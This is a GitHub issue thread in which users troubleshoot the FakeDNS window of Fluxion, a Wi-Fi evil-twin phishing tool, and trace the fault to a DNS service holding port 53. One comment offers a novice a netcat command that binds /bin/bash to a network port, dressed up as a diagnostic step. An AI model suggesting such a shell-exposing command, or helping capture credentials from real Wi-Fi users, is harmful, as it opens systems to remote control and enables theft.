### ISSUE TITLE
FakeDNS window is not opening

### ISSUE THREAD

**Issue by xmagickx** [FluxionNetwork/fluxion#242]
### Do you want to request a *feature* or report a *bug*?
*Bug*

### What is the current behaviour?
Not getting any FakeDNS Xterm

#### If the current behaviour is a bug, please provide the steps to reproduce it.
After setting up fakeAP I get all the Xterm windows except the FakeDNS xterm and so all requests to a site just hangs unless the client manually enters the AP configuration address like 192.168.0.1 on his mobile web browser

#### What do you think the expected behaviour should be?
Client should automatically redirect to ap login page

**Comment by xmagickx** [comment]
All my dependency are met. I'm using kali-rolling 2017

**Comment by deltaxflux** [comment]
Do `export FLUXIONDebug=1`

and share logs

**Comment by xmagickx** [comment]
How to do this? Please tell me

**Comment by xmagickx** [comment]
Step by step please... Where are the logs stored??

**Comment by deltaxflux** [comment]
`python:python|python2`

This design is bad because in arch the default python package is python3. Means that if you install python you install python3 instead of python2.7. So this means that if you have installed python it will skip the python2 package because python is already installed. We should use a **and** instead an `or`.

**Comment by xmagickx** [comment]
Sorry for being a noob but deltaxflux couldn't get your last comment line..

**Comment by xmagickx** [comment]
MPX4132 I did what you said... It showed

Python 2.7.13
GCC 6.3.0 20170118 on linux2
And latest fluxion also not showing fakeDNS window. Please help me

**Comment by MPX4132** [comment]
@deltaxflux Oh, I see, I didn’t know that, good catch. We might be able to replace it with just “python2” to make it explicit what we want. That might work, but I’m not close to my computer right now.

**Comment by MPX4132** [comment]
@xmagickx So it seems the issue isn’t python, it must be something else, are you in an uncommon Linux distribution?

**Comment by strasharo** [comment]
Can you, please, run:

> sudo netstat -npl | grep :53
and provide us with the output.

**Comment by xmagickx** [comment]
@MPX4132 I'm using kali linux 2017

**Comment by xmagickx** [comment]
@strasharo

tcp 0 0      127.0.2.1:53     0.0.0.0:*.    LISTEN 1/init
udp 0 0      127.0.2.1:53     0.0.0.0:*.   LISTEN 1/init

**Comment by amcguiredbitsecure** [comment]
Also try nc -l -p 9911 -c /bin/bash <ip here> and let us know the output 

Thanks,

-----------------------
- Drew McGuire
http://www.dbitsecurity.com
M: 781-996-8929

**Comment by amcguiredbitsecure** [comment]
Your dns docket is listening correctly check your ipv6 route tables and ensure it’s disabled unless you are also routing ipv6

Thanks,

-----------------------
- Drew McGuire
http://www.dbitsecurity.com
M: 781-996-8929

**Comment by amcguiredbitsecure** [comment]
Biggest issue is you have an ipv6 connection but all the tutorials are written using ipv4. You also need to forward ipv6 packets unless you specify noipv6 or ipv6.disable=1 at grub 

Thanks,

-----------------------
- Drew McGuire
http://www.dbitsecurity.com
M: 781-996-8929

**Comment by MPX4132** [comment]
@xmagickx It appears fluxion's DNS service is failing to start because the DNS port (53) is being used by something else already... are you by any chance running a DNS service? Looks like the system started the service, you need to identify what started it, kill it, and try running fluxion. This does not appear to be a fluxion issue. If you've got more info or can prove me wrong, we can reopen the issue.

**Comment by xmagickx** [comment]
@MP4132 I'm a newbie here... How to kill a process using port 53??? Please help...

@amcguiredbitsecure what ip???

**Comment by xmagickx** [comment]
@MPX4132 I'm a newbie here... How to kill a process using port 53??? Please help...

**Comment by xmagickx** [comment]
I found systemd and dnscrypt-proxy running but can't kill 2nd one... Please help how to disable it or kill it... 😥

**Comment by xmagickx** [comment]
It's restarting again and again both the above services

**Comment by xmagickx** [comment]
When I issue this command after starting fluxion without a FakeDNS window....

Netstat --tcp --udp --listening --program


Output


3 programs LISTEN on tcp only 
Lighttpd
Systemd 
But nothing on udp is in LISTEN state though these are running. dnscrpyt-proxy,dhcpd,systemd

**Comment by MPX4132** [comment]
Don't kill systemd, you'll probably crash your computer. I don't even think it's possible to kill it. I can't really help you much, you can try using Google. This is what I found to stop dnscrypt-proxy but I don't know if it'll work:

```
On Centos and RedHat based

service dcp-loader stop  
or
systemctl stop dcploader.service

On Ubuntu and Debian based

sudo service dcp-loader stop
or
sudo systemctl stop dcploader.service

On openSUSE based

service dcp-loader stop
```

If that doesn't work you can try something like:
```
systemctl stop dnscrypt-proxy.service
```
I don't know man.

**Comment by MPX4132** [comment]
You can also try using a virtual machine with linux to run fluxion, I suggest Kali, just because it comes with mostly everything pre-installed and ready.

**Comment by strasharo** [comment]
@xmagickx , can you run the following command and provide us with the output:
`grep -ni 53 /usr/lib/systemd/system/*.socket`

**Comment by xmagickx** [comment]
@strasharo It says no such file or directory

**Comment by xmagickx** [comment]
@MPX4132 THANKS BRO THANKS A TON... LASTLY systemctl command did the trick... I got fakeDNS window opening... Thanks BRO so much...
